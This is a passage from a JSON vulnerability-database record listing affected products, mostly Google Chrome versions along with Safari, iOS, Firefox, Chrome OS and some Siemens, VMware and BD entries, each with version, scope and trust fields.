        "version": "27.0.1453.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.157"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.739.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.3"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.19"
      },
      {
        "_id": null,
        "model": "influx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.27"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491059"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.159.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1028.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "65.0.3325.167"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.95"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1013"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1023"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.44"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "9.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.16"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.660.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.108"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.137"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.16"
      },
      {
        "_id": null,
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.321.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.48"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.861.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.524.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.717.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.9"
      },
      {
        "_id": null,
        "model": "sql server r2 for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.880.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.607.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.471.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.1"
      },
      {
        "_id": null,
        "model": "simatic ipc477d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.9"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "37.0.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.89"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.3.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.309.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.232"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.778.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.655.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.115"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.579.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1008"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.694.0"
      },
      {
        "_id": null,
        "model": "bactec",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "90500"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.669.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1671.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.67"
      },
      {
        "_id": null,
        "model": "simatic s7-1500 software controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.80"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.3"
      },
      {
        "_id": null,
        "model": "x-series xos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "11.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.190.2"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "39.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.400.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.31"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.97"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.592.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.902.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.444.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.39"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.15"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.104"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1272.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.548.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.640.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.23"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.020"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.18"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.9"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.103"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.110"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.759.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.4"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.84"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.8"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.1"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.0.4"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.314.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.69"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16"
      },
      {
        "_id": null,
        "model": "simatic ipc677d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.13"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.125"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1661.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.662.0"
      },
      {
        "_id": null,
        "model": "iphone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.149"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.833.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.77"
      },
      {
        "_id": null,
